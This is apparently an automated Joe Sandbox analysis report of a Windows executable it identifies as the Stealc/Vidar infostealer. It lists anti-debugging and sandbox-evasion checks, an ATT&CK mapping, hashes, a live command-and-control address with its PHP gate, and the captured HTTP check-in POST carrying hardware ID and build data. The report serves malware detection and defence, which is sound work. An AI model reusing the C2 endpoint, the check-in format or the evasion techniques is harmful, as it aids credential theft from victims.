                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E1160 GetSystemInfo,ExitProcess
                Source: file.exe, file.exe, 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWx
                Source: file.exe, 00000000.00000002.1845108606.000000000143E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1845108606.00000000014B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1845108606.000000000143E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware^a
                Source: file.exe, 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36207)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36204)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36259)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36224)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36219)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36093)
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E4610 VirtualProtect ?,00000004,00000100,00000000
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F9AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 7140, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle
                Source: file.exe, file.exe, 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: lProgram Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00527588 cpuid
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F7D20 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F7B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.4e0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1803312962.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1845108606.000000000143E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7140, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.4e0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1803312962.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1845108606.000000000143E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7140, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                MITRE ATT&CK Matrix (one line per tactic; cells listed top to bottom, with the signature count that preceded a technique in the matrix kept in parentheses)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: Command and Scripting Interpreter (2); Native API (12); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (334)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label | Link
https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe |
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.php | true | | unknown
http://185.215.113.206/ | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.php1 | file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpQ | file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/B | file.exe, 00000000.00000002.1845108606.0000000001496000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.php/ | file.exe, 00000000.00000002.1845108606.0000000001496000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.1845108606.000000000143E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.206/6c4adf523b719729.php) | file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpI | file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpu | file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/G | file.exe, 00000000.00000002.1845108606.0000000001496000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000003.1803312962.000000000514B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1544500
                                      Start date and time:2024-10-29 14:10:07 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 3m 30s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:1
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 80%
                                      • Number of executed functions: 19
                                      • Number of non-executed functions: 123
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Stop behavior analysis, all processes terminated
                                      • Excluded IPs from analysis (whitelisted): 4.175.87.197
                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: file.exe
                                      No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Quasar, Stealc | 185.215.113.206/6c4adf523b719729.php
 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                                      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
 | file.exe | malicious | LummaC | 185.215.113.16
 | file.exe | malicious | Stealc | 185.215.113.206
 | file.exe | malicious | Stealc, Vidar | 185.215.113.206
 | file.exe | malicious | LummaC | 185.215.113.16
 | file.exe | malicious | Stealc | 185.215.113.206
 | file.exe | malicious | Stealc, Vidar | 185.215.113.206
 | file.exe | malicious | LummaC | 185.215.113.16
 | file.exe | malicious | LummaC | 185.215.113.16
 | file.exe | malicious | Stealc | 185.215.113.206
                                      No context
                                      No context
                                      No created / dropped files found
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.955565837224271
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:file.exe
                                      File size:2'113'024 bytes
                                      MD5:ab7d9340bee9cb1f62845fcaea9476cb
                                      SHA1:aadac5ac21e4e0160dca5ac67727ab5bb436b63b
                                      SHA256:390a2c58405e383d833df9f7bc6c5abcfa292b73e8297ccfe05c043b084ff29b
                                      SHA512:facbbfb7823915deeb271078f909338d514774ee8d12f3aa04b581a5263d010cc58775ad852cbb86b8c0368cb221fcf152353e4df7af113f5d73f6057fcaf822
                                      SSDEEP:49152:pPnNEg544+TK8I1HoTdYO7fj3rX26BfWRU1CwSFBKOBXBz2Jtjeu:pvJa4e2oTeKjrBfWdwoKOBRzKQu
                                      TLSH:C5A5339F1817FB66E9358B7DC69BCBC80791338293FC57F88A5B58329200909B792C5D
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                                      Icon Hash:90cececece8e8eb0
                                      Entrypoint:0xb19000
                                      Entrypoint Section:.taggant
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                      Instruction
                                      jmp 00007F9FD0C0535Ah
                                      hint_nop dword ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add cl, ch
                                      add byte ptr [eax], ah
                                      add byte ptr [eax], al
                                      add byte ptr [edx], al
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dl
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [ebx], al
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], cl
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add cl, byte ptr [edx]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      xor byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [edx], ah
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [ecx], al
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      push es
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dh
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], cl
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add cl, byte ptr [edx]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      xor byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      sbb al, 00h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add dword ptr [eax+00000000h], eax
                                      add byte ptr [eax], al
                                      Programming Language:
                                      • [C++] VS2010 build 30319
                                      • [ASM] VS2010 build 30319
                                      • [ C ] VS2010 build 30319
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x2e7000 | 0x67600 | e4bd6153f24730c4ae14c294c4f5bb35 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x2ea000 | 0x295000 | 0x200 | e5b352016fdd15d42b786d7215b96351 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dlatbedx | 0x57f000 | 0x199000 | 0x198c00 | f8d848c83d09261cd7021f1d36598509 | False | 0.994636372324159 | data | 7.952200303038952 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ncjyujoo | 0x718000 | 0x1000 | 0x600 | 9bf9cf7dc257c3a6894ff8241c0d99f4 | False | 0.5520833333333334 | data | 4.914453457263019 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x719000 | 0x3000 | 0x2200 | ede9711f96dc41c337884a01f467827c | False | 0.05307904411764706 | DOS executable (COM) | 0.5967975301874965 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-29T14:11:19.442782+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49735 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 29, 2024 14:11:18.251501083 CET | 49735 | 80 | 192.168.2.4 | 185.215.113.206
Oct 29, 2024 14:11:18.257097960 CET | 80 | 49735 | 185.215.113.206 | 192.168.2.4
Oct 29, 2024 14:11:18.257257938 CET | 49735 | 80 | 192.168.2.4 | 185.215.113.206
Oct 29, 2024 14:11:18.260381937 CET | 49735 | 80 | 192.168.2.4 | 185.215.113.206
Oct 29, 2024 14:11:18.265788078 CET | 80 | 49735 | 185.215.113.206 | 192.168.2.4
Oct 29, 2024 14:11:19.158421040 CET | 80 | 49735 | 185.215.113.206 | 192.168.2.4
Oct 29, 2024 14:11:19.158534050 CET | 49735 | 80 | 192.168.2.4 | 185.215.113.206
Oct 29, 2024 14:11:19.162049055 CET | 49735 | 80 | 192.168.2.4 | 185.215.113.206
Oct 29, 2024 14:11:19.167618990 CET | 80 | 49735 | 185.215.113.206 | 192.168.2.4
Oct 29, 2024 14:11:19.442651987 CET | 80 | 49735 | 185.215.113.206 | 192.168.2.4
Oct 29, 2024 14:11:19.442781925 CET | 49735 | 80 | 192.168.2.4 | 185.215.113.206
Oct 29, 2024 14:11:22.239335060 CET | 49735 | 80 | 192.168.2.4 | 185.215.113.206
                                      • 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 185.215.113.206 | 80 | 7140 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data

Oct 29, 2024 14:11:18.260381937 CET | 90 | OUT
GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Oct 29, 2024 14:11:19.158421040 CET | 203 | IN
HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 13:11:19 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Oct 29, 2024 14:11:19.162049055 CET | 412 | OUT
POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CBAKEBGIIDAFIDHIIECF
Host: 185.215.113.206
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 35 32 33 45 39 34 37 37 30 42 36 31 32 33 33 31 37 34 37 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 2d 2d 0d 0a
